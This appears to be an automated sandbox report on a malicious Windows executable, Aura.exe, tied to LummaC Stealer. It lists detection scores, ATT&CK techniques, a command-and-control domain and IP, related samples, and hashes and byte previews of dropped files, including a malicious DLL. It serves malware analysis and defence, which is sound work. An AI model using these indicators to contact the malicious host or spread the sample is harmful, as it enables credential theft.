    Remote System Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
    Obfuscated Files or Information
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing
    Cached Domain Credentials43
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Aura.exe37%ReversingLabsWin32.Trojan.Generic
    Aura.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://property-imper.sbs/Qq0%Avira URL Cloudsafe
    https://property-imper.sbs/apiNlV&0%Avira URL Cloudsafe
    https://property-imper.sbs/api%0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    property-imper.sbs
    104.21.33.116
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://property-imper.sbs/apifalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://property-imper.sbs/api%aspnet_regiis.exe, 00000003.00000003.2070154688.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.00000000029FC000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://ocsp.entrust.net03Aura.exefalse
          high
          http://ocsp.entrust.net02Aura.exefalse
            high
            http://www.entrust.net/rpa03Aura.exefalse
              high
              http://aia.entrust.net/ts1-chain256.cer01Aura.exefalse
                high
                http://upx.sf.netAmcache.hve.6.drfalse
                  high
                  https://property-imper.sbs/Qqaspnet_regiis.exe, 00000003.00000002.2075233661.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A86000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.entrust.net/ts1ca.crl0Aura.exefalse
                    high
                    https://property-imper.sbs/aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A86000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://property-imper.sbs/apiNlV&aspnet_regiis.exe, 00000003.00000002.2075233661.0000000002A80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2070154688.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.entrust.net/2048ca.crl0Aura.exefalse
                        high
                        https://www.entrust.net/rpa0Aura.exefalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          104.21.33.116
                          property-imper.sbsUnited States
                          13335CLOUDFLARENETUSfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1561474
                          Start date and time:2024-11-23 14:16:56 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 54s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:10
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Aura.exe
                          Detection:MAL
                          Classification:mal100.evad.winEXE@6/12@1/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 90%
                          • Number of executed functions: 17
                          • Number of non-executed functions: 43
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 172.202.163.200, 52.165.164.15, 20.42.65.92, 4.245.163.56
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: Aura.exe
                          TimeTypeDescription
                          08:17:48API Interceptor2x Sleep call for process: aspnet_regiis.exe modified
                          08:18:04API Interceptor2x Sleep call for process: SIHClient.exe modified
                          08:18:17API Interceptor1x Sleep call for process: WerFault.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          104.21.33.116injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                            file.exeGet hashmaliciousLummaC StealerBrowse
                              file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                file.exeGet hashmaliciousUnknownBrowse
                                  file.exeGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                      file.exeGet hashmaliciousUnknownBrowse
                                        Script.exeGet hashmaliciousLummaC StealerBrowse
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                            file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              property-imper.sbsinjector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.33.116
                                              loader.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.162.84
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.33.116
                                              file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                              • 104.21.33.116
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 104.21.33.116
                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                              • 172.67.162.84
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.162.84
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 104.21.33.116
                                              Loader.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.162.84
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.33.116
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUSinjector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.88.250
                                              injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.44.93
                                              injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.33.116
                                              loader.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.162.84
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.33.116
                                              file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                              • 104.21.33.116
                                              psol.txt.ps1Get hashmaliciousLummaCBrowse
                                              • 172.66.0.235
                                              SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.88.250
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 104.21.33.116
                                              Setup.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.67.179
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              a0e9f5d64349fb13191bc781f81f42e1injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.33.116
                                              injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.33.116
                                              injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.33.116
                                              loader.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.33.116
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.33.116
                                              file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                              • 104.21.33.116
                                              psol.txt.ps1Get hashmaliciousLummaCBrowse
                                              • 104.21.33.116
                                              SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.33.116
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 104.21.33.116
                                              Setup.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.33.116
                                              No context
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.9814578593741706
                                              Encrypted:false
                                              SSDEEP:96:ntgFTBPXVjHvwUMldvxmoijCQXIDcQvc6QcEVcw3cE/n+BHUHZ0ownOgHkEwH3d7:+39jQkd0BU/KaGtizuiF7Z24IO8C
                                              MD5:F842CCB8F6595FC319E1A9F62D2622B0
                                              SHA1:AC85CCBEBD0A90DCC75D23E5C0262C23068733B7
                                              SHA-256:5B8CAEA70BF04ED9B803C14B76C7C039A641359712C084FF6E475142D872EC3E
                                              SHA-512:F406747E9D6A79D57B38BFEF73CE24DB79969F673F080C115093152D839401AC6A94E064BA8A0A831FF27E56CED66AEAD19535419405C475E49E8DD7940A57B5
                                              Malicious:true
                                              Reputation:low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.4.1.4.6.5.5.6.6.0.7.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.4.1.4.6.6.9.0.9.8.2.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.9.1.5.2.0.0.-.1.f.3.b.-.4.d.4.c.-.8.3.2.8.-.9.7.b.9.c.f.8.2.a.6.7.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.b.d.6.c.9.4.-.b.2.5.8.-.4.0.9.1.-.9.5.0.2.-.b.b.2.e.b.c.4.d.b.0.7.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.u.r.a...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.Q.u.i.n.n.A.v.a.K.a.i.t.l.y.n...t.S.y.S.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.1.4.-.0.0.0.1.-.0.0.1.4.-.2.1.e.b.-.f.1.1.4.a.a.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.4.d.9.0.8.5.6.2.3.7.2.6.3.9.1.1.9.f.f.5.f.c.7.e.0.e.4.c.8.b.5.2.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 15 streams, Sat Nov 23 13:17:46 2024, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):198480
                                              Entropy (8bit):3.3202316704502453
                                              Encrypted:false
                                              SSDEEP:1536:vnTFzTefNyCLpN4uE2aO0ZdLTgvIIgXQMNxPZKVCDHGWw8X0aTL:vnTF4y84uEqALTgvAt8AA8X7T
                                              MD5:416DB9EAC1C80D8266BBC02331E6F001
                                              SHA1:40C77D34877C015155C22F3AD83A25199CD8B800
                                              SHA-256:65ED1E6A7A2F2B7339B8E5C195D8C17516918F841AD305615935D60F7CB97F1D
                                              SHA-512:F238B015AB5C34DC0DDCFA756842DFA1DAB878DC29CF5896CEE0246FAA48706B9262609E0E3C0F0D78050BB9CF8DD9B96DA8DB488CD613846E27C9EE22FB0B69
                                              Malicious:false
                                              Reputation:low
                                              Preview:MDMP..a..... .........Ag............D...............X.......$................J..........`.......8...........T...........00.. ...........,............ ..............................................................................eJ....... ......GenuineIntel............T.............Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8398
                                              Entropy (8bit):3.704072032362569
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJ5L65x6YEIISU9jUZZyfgmfZUYaprB89bZZsfwzm:R6lXJF6/6YEXSU9IXigmfWYRZyfp
                                              MD5:6A0A608C672EBA0A0C995501CA6D4973
                                              SHA1:57881BEDA3528D825C132AD904ABA9D6A80CD1A3
                                              SHA-256:7DA6558AB5B57294C701230CD9030360D5C22229341DFA20E9D17B1A3506EDD3
                                              SHA-512:2ECA0DD3037216FE0750D6621C785B0D9A36D335D33C4F891CDADCCE81558A4A8FBC9937D4D7BE7E87E88504D11EA2AAD5C4F50C3D05252C65B48398C7576236
                                              Malicious:false
                                              Reputation:low
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.3.6.<./.P.i.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4753
                                              Entropy (8bit):4.506260091381083
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zsJJg77aI94rWpW8VYgYm8M4JzU2FBu+q8vOUt3yNxuQJd:uIjfbI7ia7VsJzAKOO3tQJd
                                              MD5:56F4BE32D3C4D0F96EE262845F4D5ED9
                                              SHA1:82AA4E9EEE61E882F2F379BB1F5C84770A2A11EA
                                              SHA-256:EF2FEB5C8637703A2B149DBAD1BE31EFCEF5B473E622DFE629C6EAAD97143277
                                              SHA-512:399C0C64D2FD1261BB0004AE82AAE191F851FD7D1863DED79DB7E6F7AC096FC90785D78A0DA659073FC049A325B6FEDC0CB2826F2397EB5BE8ED677549182741
                                              Malicious:false
                                              Reputation:low
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600740" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                              Process:C:\Users\user\Desktop\Aura.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):464384
                                              Entropy (8bit):7.111104441914894
                                              Encrypted:false
                                              SSDEEP:12288:+qUsJ6bge8fEbpbQ9DyMLHTyzzCAKzGtwkkffltwsnxa43qo97oU9u16GA8Ai2N2:+4J6Ee8fEbpbQ9DyMLHTyzzCAKzGtwkR
                                              MD5:EE85BDD66F4D21A73B522E93399FB2BC
                                              SHA1:BFA09EBA3ADD78D6F35DF6B521C1590EBC6FEF40
                                              SHA-256:400AAA1B80813F928DCBD67EA3BB5939B9338DD336BA3E73EAEFC48CCECA06F7
                                              SHA-512:05518C5FF2A1AAA4E16D167171B8A8EF0E9D48A5760890AA3F7C782549AEBC125EC5F2638B6F783C1FFA2E2F65237580082E627CA3FEDB98563878E152A0486E
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L..../Ag...........!.........t...............................................@............@.............................|.......P............................ ..D...\...............................x...@...............T............................text............................... ..`.rdata...\.......^..................@..@.data........ ......................@....reloc..D.... ......................@..B................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\SIHClient.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):3.1827158197423437
                                              Encrypted:false
                                              SSDEEP:192:Fo099jgiVuXkNPNBFeaC5Oj7bT36ECat2/x:FPjgiVuXkNFBFeL5Oj7X36ECat2/x
                                              MD5:8B62E72B286BD8AA41144C706E9D3C4D
                                              SHA1:F65C6B6AEB35E618714492A5D77F9E56CDC1BFD4
                                              SHA-256:7673E39637E39031E2415D854BC2A11655D664ED6CF6105238A34689EFE20986
                                              SHA-512:4F99F218F6EF913D185AE5776B9FB9AD62FE83D1F89EEB913403F4209152E36970D6630912FEDB1EA2B089EE34F89301364858527BEA38D32E08798AB3FD38B5
                                              Malicious:false
                                              Reputation:low
                                              Preview:....P...P.......................................P...!...........................`........T......................eJ.........8.=..Zb....... ......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............'Z...=..........S.I.H._.t.r.a.c.e._.l.o.g...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.S.I.H.\.S.I.H...2.0.2.4.1.1.2.3...0.8.1.8.0.1...0.7.6...1...e.t.l.......P.P.`........T......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\SIHClient.exe
                                              File Type:Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                              Category:dropped
                                              Size (bytes):17126
                                              Entropy (8bit):7.3117215578334935
                                              Encrypted:false
                                              SSDEEP:192:D5X8WyNHDHFzqDHt8AxL5TKG+tJSdqnajapCNjFZYECUqY7oX9qhnJSdqnaja2Sl:qDlsHq4ThPdlmY9CUiqOdlm2W
                                              MD5:1B6460EE0273E97C251F7A67F49ACDB4
                                              SHA1:4A3FDFBB1865C3DAED996BDB5C634AA5164ABBB8
                                              SHA-256:3158032BAC1A6D278CCC2B7D91E2FBC9F01BEABF9C75D500A7F161E69F2C5F4A
                                              SHA-512:3D256D8AC917C6733BAB7CC4537A17D37810EFD690BCA0FA361CF44583476121C9BCCCD9C53994AE05E9F9DFF94FFAD1BB30C0F7AFF6DF68F73411703E3DF88A
                                              Malicious:false
                                              Preview:MSCF............D................|...............A..........d.......................environment.xml.....b...CK..ao.0...J...&.q...-..;+.6+-i.......7.....=....g.P.RQ.#..#...QQ..p.kk..qX..)...T.....zL#<.4......\k..f..,.Q...`..K7.hP..".E.53.V.DW.X).z.=`.COO 8..8.......!$.P!`00....E.m..l .)".J.vC..J..&...5.5(.a..!..MIM...*......z.;......t.<.o..|CR.3>..n.;8dX....:....N.....U.......J.I(vT..3...N....$.._^.A<....&=._(N....m.u.1}.....Ax.b8....q~.i..0.A...*.H........A.0.@....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...,..gK.........(...._`Oa..;%.010...`.H.e....... K...,.%@.b./.a...Q.:..E.7....V~....0...0..........3....!.G~&.9......0...*.H........0~1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1(0&..U....Microsoft Update Signing CA 2.20...190502214449Z..200502214449Z0o1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft Update0.."0...*
                                              Process:C:\Windows\System32\SIHClient.exe
                                              File Type:Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                              Category:dropped
                                              Size (bytes):24490
                                              Entropy (8bit):7.629144636744632
                                              Encrypted:false
                                              SSDEEP:384:iarwQcY8StpA7IQ6GCq30XPSIleI7lzCuqvfiSIleIx:iartHA7PCFP66Tqvfi6c
                                              MD5:ACD24F781C0C8F48A0BD86A0E9F2A154
                                              SHA1:93B2F4FBF96D15BE0766181AFACDB9FD9DD1B323
                                              SHA-256:5C0A296B3574D170D69C90B092611646FE8991B8D103D412499DBE7BFDCCCC49
                                              SHA-512:7B1D821CF1210947344FCF0F9C4927B42271669015DEA1C179B2BEAD9025941138C139C22C068CBD7219B853C80FA01A04E26790D8D76A38FB8BEBE20E0A2A4A
                                              Malicious:false
                                              Preview:MSCF............D...............#................A..........d........B..............environment.cab.x.\&..BCK.\.T...N.....;LB.JW.. .w!....$*...U....."........ (.. E..........w...e.Jf.3gN.{...{V.M4.!.....hn. p(... .a...f..f..j.....Kh5..l.DB\}.=.0.>..X.....z..,'..LC/>....h.>.>.........,~mVI.....'EGD]^..\{....Q....f...4.F.....q..FF.1~...Q,.."g.qq.......}.....g%Zz.;m.9..z../2Jl.p8wGO......-V....FM......y*.....Hy.xy......N.r;.@uV........Xa...b].`..F...y.Wd.e.8.[Z.s7].....=B.$...'.|.-.sC....a_(..$..i.C.T.F}...]...m.R,y.1...'..j3.....ir..B..)sR.G.*..`-=.w....m..2y.....*o...\{..C.4.:ZM..wL-$.I.x:?.!.....:..W.%&.....J.%.....~....E..T.d.Q{..p..J..pY...P../.."rp....`...#w.....'.|n%Dy,.....i....."..x.....b._..\_.^.XOo..*:.&a.`..qA.?.@..t.R/...X3.nF.&........1Z.r.S...9x........?..aP..A...f..k:..\....L...t....Q...1..A..33A1.t..)...c....;......$.$..>._....A.!g`..t...b.H.L..&.....!......v~.n...uE.x...."5.h.4..B.R.d.4.%--.`.B..."..[....l......x(..5......@.zr....
                                              Process:C:\Windows\System32\SIHClient.exe
                                              File Type:Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                              Category:dropped
                                              Size (bytes):19826
                                              Entropy (8bit):7.454351722487538
                                              Encrypted:false
                                              SSDEEP:384:3j+naF6zsHqnltHNsAR9zCfsOCUPTNbZR9zOzD8K:z1F6JLts89zIdrFT9zwoK
                                              MD5:455385A0D5098033A4C17F7B85593E6A
                                              SHA1:E94CC93C84E9A3A99CAD3C2BD01BFD8829A3BCD6
                                              SHA-256:2798430E34DF443265228B6F510FC0CFAC333100194289ED0488D1D62C5367A7
                                              SHA-512:104FA2DAD10520D46EB537786868515683752665757824068383DC4B9C03121B79D9F519D8842878DB02C9630D1DFE2BBC6E4D7B08AFC820E813C250B735621A
                                              Malicious:false
                                              Preview:MSCF....Z.......D................/..........Z....J..........d.......................environment.xml........CK....8.....w..=.9%T`.eu:.jn.E.8......m_.o?...5.K.{.3X3....^.{i..b......{.+.....y:..KW;;\..n.K=.]k..{.=..3......D$.&IQH.$-..8.r.{..HP.........g....^..~......e.f2^..N.`.B..o.t....z..3..[#..{S.m..w....<M...j..6.k.K.....~.SP.mx..;N.5..~\.[.!gP...9r@"82"%.B%..<2.c....vO..hB.Fi....{...;.}..f|..g.7..6..].7B..O..#d..]Ls.k..Le...2.*..&I.Q.,....0.\.-.#..L%.Z.G..K.tU.n...J..TM....4....~...:..2.X..p.d....&.Bj.P(.."..).s.d....W.=n8...n...rr..O._.yu...R..$....[...=H"K<.`.e...d.1.3.gk....M..<R......%1BX.[......X.....q......:...3..w....QN7. .qF..A......Q.p...*G...JtL...8sr.s.eQ.zD.u...s.....tjj.G.....Fo...f`Bb<.]k..e.b..,.....*.1.:-....K.......M..;....(,.W.V(^_.....9.,`|...9...>..R...2|.|5.r....n.y>wwU..5...0.J...*.H........J.0.I....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...>^..~a..e.D.V.C...
                                              Process:C:\Windows\System32\SIHClient.exe
                                              File Type:Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                              Category:dropped
                                              Size (bytes):30005
                                              Entropy (8bit):7.7369400192915085
                                              Encrypted:false
                                              SSDEEP:768:ouCAyCeQ8fkZdfTGo/its89z8gjP69zA4:Aqf56z8HzT
                                              MD5:4D7FE667BCB647FE9F2DA6FC8B95BDAE
                                              SHA1:B4B20C75C9AC2AD00D131E387BCB839F6FAAABCA
                                              SHA-256:BE273EA75322249FBF58C9CAD3C8DA5A70811837EF9064733E4F5FF1969D4078
                                              SHA-512:DDB8569A5A5F9AD3CCB990B0A723B64CEE4D49FA6515A8E5C029C1B9E2801F59259A0FC401E27372C133952E4C4840521419EF75895260FA22DFF91E0BE09C02
                                              Malicious:false
                                              Preview:MSCF.....+......D...............[I...........+...I..........d.......rM..............environment.cab...Q.!+rMCK.|.XT....CI7.....AR..$..C$D....RA:....T..........o...g...>.....s....z...>..<...J.R.A......%}..... 0............\...e.z...@..{..,./.:9:X8.s^q...>.(]...I)....'..v@....!.(.i.n.!.g.8\/.+X3.E.~.pi...Q...B...."Oj..~.:....M....uB.}..v.WR........tDD......D7..j..`..5..E.2.z..C....4.s....r..Y.:.|.mtg...S..b._.....!.~Kn..E.=...x.N..e.)....xz...p..h.;..xR'...U.}........nK.+.Y........p..r _.;?.m}$..*%&...8. 7..T....,7..F...e...kI.y...q....".W.W..[..gZQ.....W.$k.T"...N.*...5.R...,+...u.~VO...R-......H7..9........].K....]....tS~*.LSi....T....3+........k......i.J.y...,.Y|.N.t.LX.....zu..8......S*7..{y.m.....Ob.....^.S8Kn.i.._.c~.x.ce.A...t........S.......i1......V..S]H....$..J....E..j...4...o.$..).....;.n<.b.}.(.J.]...Q..u,.-.Bm.[z.j..-i.."...._v.......N..+...g..v..../...;G.Yw....0..u...z....J..K.E..s&..u.h3.]J.G............Z....=.N.X..
